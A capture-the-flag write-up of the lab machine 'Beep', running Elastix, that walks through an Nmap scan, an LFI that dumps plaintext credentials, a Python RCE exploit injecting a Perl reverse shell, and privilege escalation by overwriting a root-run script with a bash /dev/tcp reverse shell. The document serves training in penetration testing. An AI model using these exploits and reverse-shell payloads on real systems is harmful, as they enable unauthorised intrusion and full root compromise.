The first step, as with all machines is to run an Nmap scan to identify the running services.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 # Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7 Nmap scan report for 10.10.10.7 Host is up (0.033s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.10.10.7/ |_https-redirect: ERROR: Script execution failed (use -d to debug) 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) PIPELINING AUTH-RESP-CODE USER STLS UIDL APOP EXPIRE(NEVER) TOP 111/tcp open rpcbind 2 (RPC #100000) 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: CONDSTORE CATENATE ACL CHILDREN OK URLAUTHA0001 X-NETSCAPE LITERAL+ LIST-SUBSCRIBED LISTEXT IDLE MULTIAPPEND MAILBOX-REFERRALS QUOTA NAMESPACE UIDPLUS Completed ID ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte THREAD=ORDEREDSUBJECT SORT SORT=MODSEQ IMAP4 RENAME UNSELECT NO BINARY IMAP4rev1 ATOMIC STARTTLS 443/tcp open ssl/https? |_ssl-date: 2020-08-23T10:30:15+00:00; +2m01s from scanner time. 878/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) 4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap) 4445/tcp open upnotifyp? 4559/tcp open hylafax HylaFAX 4.3.10 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-server-header: MiniServ/1.570 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=8/23%OT=22%CT=1%CU=43276%PV=Y%DS=2%DC=I%G=Y%TM=5F42455 OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=A)OPS(O OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS% OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0% OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z% OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y% OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix Host script results: |_clock-skew: 2m00s OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Aug 23 06:30:49 2020 -- 1 IP address (1 host up) scanned in 384.20 seconds
From here we can see there are numerous services running on the box. Most notable a SQL server, Mail server, and PBX. I started by browsing to port 80 and found that the Elastix server software was running. I attempted to log in with default credentials but this was unsuccessful.
I did some searching for exploits with Elastix. It’s difficult to tell from the login page which version of the software is running so much of this is trial and error. I found the LFI exploit HERE which allows you to view the amportal.conf configuration file. This file includes plain text credentials for the elastix web interface. It can be browsed to via the following link:
Inside this file you have the following block of text, which includes the login credentials to login to the Elastix web interface.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 AMPDBHOST=localhost AMPDBENGINE=mysql # AMPDBNAME=asterisk AMPDBUSER=asteriskuser # AMPDBPASS=amp109 AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin #AMPMGRPASS=amp111 AMPMGRPASS=jEhdIekWmdjE FOPWEBROOT=/var/www/html/panel #FOPPASSWORD=passw0rd FOPPASSWORD=jEhdIekWmdjE ARI_ADMIN_USERNAME=admin ARI_ADMIN_PASSWORD=jEhdIekWmdjE vtigerCRM adminL:jEhdIekWmdjE
Next I found THIS exploit which leverages the $to parameter in the callme_page.php page to provide remote code execution. By default, this code would not work due to certificate errors on the login page. It had to be modified slightly to rectify this, along with modifying the lhost and rhost values. I also had to reduce the minimum SSL version on my Kali machine by editing /etc/ssl/openssl.conf to accept TLSv1. I also needed to modify the extension number to match that on the Beep machine. This can be gathered by logging into the Elastix web interface, opening the PBX tab and finding the user name Fanis Papafanopoulos with the extension 233. The code for the exploit ultimately looked like the following:
1 2 3 4 5 6 7 8 9 10 11 import urllib rhost="10.10.10.7" lhost="10.10.14.29" lport=443 extension="233" # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' urllib.urlopen(url)
I then started a netcat listener on port 443, ran the exploit and successfully received a shell on the listener. I upgraded the shell using python to something a bit more workable, then was able to browse to the fanis user and capture the user flag.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 kali@kali:/etc/ssl$ sudo nc -lvp 443 listening on [any] 443 ... 10.10.10.7: inverse host lookup failed: Unknown host connect to [10.10.14.13] from (UNKNOWN) [10.10.10.7] 59571 python -c 'import pty; pty.spawn("/bin/bash")' bash-3.2$ whoami whoami asterisk bash-3.2$ cd /home cd /home bash-3.2$ ls ls fanis spamfilter bash-3.2$ cd fanis cd fanis bash-3.2$ ls ls user.txt bash-3.2$ cat user.txt cat user.txt [REDACTED] bash-3.2$
Next we have to escalate privileges to root. I ran “ps aux” to find which programs were currently running. The following program caught my eye as it was running as a root user, however the file belonged to and had write permissions for the asterisk user. This allows me to modify the file, then have it run as root to spawn a root reverse shell.
1 root 3571 0.0 0.1 4636 1168 ? S 21:06 0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start
I started by modifying the file with the following reverse shell:
1 2 #!/bin/bash bash -i >& /dev/tcp/10.10.14.29/2600 0>&1
I then started a netcat listener on port 2600 on the kali machine:
1 2 kali@kali:~$ sudo nc -lvp 2600 listening on [any] 2600 ...
I then needed to find a way of starting that elastix-updaterd process. After some trial and error I found that restarting the system through the elastix interface caused the elastix-updaterd script to run as the root user.
Once this reboot completed, I was presented with a shell on my netcat listener. From here i identified it was a root shell, and was then able to cat the root flag.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 kali@kali:~$ sudo nc -lvp 2600 listening on [any] 2600 ... 10.10.10.7: inverse host lookup failed: Unknown host connect to [10.10.14.29] from (UNKNOWN) [10.10.10.7] 47950 bash: no job control in this shell bash-3.2# whoami root bash-3.2# cd /root bash-3.2# ls anaconda-ks.cfg elastix-pr-2.2-1.i386.rpm install.log install.log.syslog postnochroot root.txt webmin-1.570-1.noarch.rpm bash-3.2# cat root.txt [REDACTED] bash-3.2#